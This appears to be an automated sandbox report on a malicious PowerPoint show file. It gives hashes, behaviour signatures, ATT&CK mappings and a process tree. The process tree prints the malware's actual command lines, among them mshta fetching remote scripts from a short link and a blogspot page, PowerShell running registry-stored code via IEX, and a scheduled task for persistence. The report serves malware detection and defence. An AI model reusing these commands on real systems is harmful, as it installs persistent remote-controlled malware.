Analysis

  • max time kernel
    77s
  • max time network
    129s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    25-02-2021 02:49

General

  • Target

    0a05b3c30c42b87df3944f1bcdba0db6884734641220790bc86909de80ebfdde.pps

  • Size

    140KB

  • MD5

    aef3c7aa3a68afaa0b1a3540b0952b52

  • SHA1

    01c7fe4b25a0dbc5dd6aa2a24817284859a44aaa

  • SHA256

    0a05b3c30c42b87df3944f1bcdba0db6884734641220790bc86909de80ebfdde

  • SHA512

    1e0576913519310281d3fad4d623209e7d5ac3e731d0348f46413a7cfc853be891b753d8a2474a97c5d902abbb947550e0e7765a2cc44e6d93a540bc2ebae269

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\0a05b3c30c42b87df3944f1bcdba0db6884734641220790bc86909de80ebfdde.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\SYSTEM32\mSHtA.exe
      mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowadkwnduhand
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2228
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 636 -s 3124
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1536
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2272
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im winword.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1900
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:504
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/35.html""\"", 0 : window.close"\")
        3⤵
        • Creates scheduled task(s)
        PID:3480
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:3568
    • C:\Program Files\Microsoft Office\Root\Office16\winword.exe
      winword
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2972

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    MD5

    c2d06c11dd1f1a8b1dedc1a311ca8cdc

    SHA1

    75c07243f9cb80a9c7aed2865f9c5192cc920e7e

    SHA256

    91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

    SHA512

    db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

  • memory/504-51-0x000000000A6E0000-0x000000000A6E1000-memory.dmp
    Filesize

    4KB

  • memory/504-39-0x0000000008740000-0x0000000008741000-memory.dmp
    Filesize

    4KB

  • memory/504-55-0x000000000B790000-0x000000000B791000-memory.dmp
    Filesize

    4KB

  • memory/504-30-0x0000000004EF2000-0x0000000004EF3000-memory.dmp
    Filesize

    4KB

  • memory/504-31-0x00000000078B0000-0x00000000078B1000-memory.dmp
    Filesize

    4KB

  • memory/504-54-0x000000000AC10000-0x000000000AC11000-memory.dmp
    Filesize

    4KB

  • memory/504-49-0x000000000A5D0000-0x000000000A5D1000-memory.dmp
    Filesize

    4KB

  • memory/504-47-0x000000000A640000-0x000000000A641000-memory.dmp
    Filesize

    4KB

  • memory/504-45-0x0000000009870000-0x0000000009871000-memory.dmp
    Filesize

    4KB

  • memory/504-44-0x0000000008D00000-0x0000000008D01000-memory.dmp
    Filesize

    4KB

  • memory/504-23-0x00000000052C0000-0x00000000052C1000-memory.dmp
    Filesize

    4KB

  • memory/504-22-0x0000000073B00000-0x00000000741EE000-memory.dmp
    Filesize

    6.9MB

  • memory/504-17-0x0000000000000000-mapping.dmp
  • memory/504-63-0x0000000004EF3000-0x0000000004EF4000-memory.dmp
    Filesize

    4KB

  • memory/504-28-0x0000000004EF0000-0x0000000004EF1000-memory.dmp
    Filesize

    4KB

  • memory/636-7-0x0000000000000000-mapping.dmp
  • memory/1144-6-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-3-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-62-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-4-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-61-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-60-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-59-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1144-58-0x00007FFE1FFF0000-0x00007FFE21BCD000-memory.dmp
    Filesize

    27.9MB

  • memory/1144-5-0x00007FFE1F9B0000-0x00007FFE1FFE7000-memory.dmp
    Filesize

    6.2MB

  • memory/1144-2-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp
    Filesize

    64KB

  • memory/1536-20-0x0000024527F20000-0x0000024527F21000-memory.dmp
    Filesize

    4KB

  • memory/1900-16-0x0000000000000000-mapping.dmp
  • memory/2228-18-0x0000000000000000-mapping.dmp
  • memory/2272-33-0x00000000078A0000-0x00000000078A1000-memory.dmp
    Filesize

    4KB

  • memory/2272-29-0x0000000005272000-0x0000000005273000-memory.dmp
    Filesize

    4KB

  • memory/2272-19-0x0000000000000000-mapping.dmp
  • memory/2272-26-0x0000000007AE0000-0x0000000007AE1000-memory.dmp
    Filesize

    4KB

  • memory/2272-41-0x0000000008AD0000-0x0000000008AD1000-memory.dmp
    Filesize

    4KB

  • memory/2272-57-0x000000000A960000-0x000000000A961000-memory.dmp
    Filesize

    4KB

  • memory/2272-37-0x00000000082B0000-0x00000000082B1000-memory.dmp
    Filesize

    4KB

  • memory/2272-35-0x0000000007A40000-0x0000000007A41000-memory.dmp
    Filesize

    4KB

  • memory/2272-25-0x0000000005270000-0x0000000005271000-memory.dmp
    Filesize

    4KB

  • memory/2272-21-0x0000000073B00000-0x00000000741EE000-memory.dmp
    Filesize

    6.9MB

  • memory/2972-9-0x0000000000000000-mapping.dmp
  • memory/2972-13-0x00007FFE1F9B0000-0x00007FFE1FFE7000-memory.dmp
    Filesize

    6.2MB

  • memory/3480-15-0x0000000000000000-mapping.dmp
  • memory/3568-8-0x0000000000000000-mapping.dmp